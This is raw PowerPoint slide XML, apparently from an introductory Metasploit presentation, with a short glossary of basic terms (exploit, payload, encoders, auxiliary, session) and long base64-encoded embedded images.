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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MEtasploit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41842" y="1219200"/>
            <a:ext cx="8181974" cy="5029200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Terminology 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	Exploit: vector for penetrating the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Payload: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, what you want the exploit to do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Encoders: encode or mangle payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Auxiliary: other modules besides exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Session: connection from a successful exploit</a:t>
            </a:r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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,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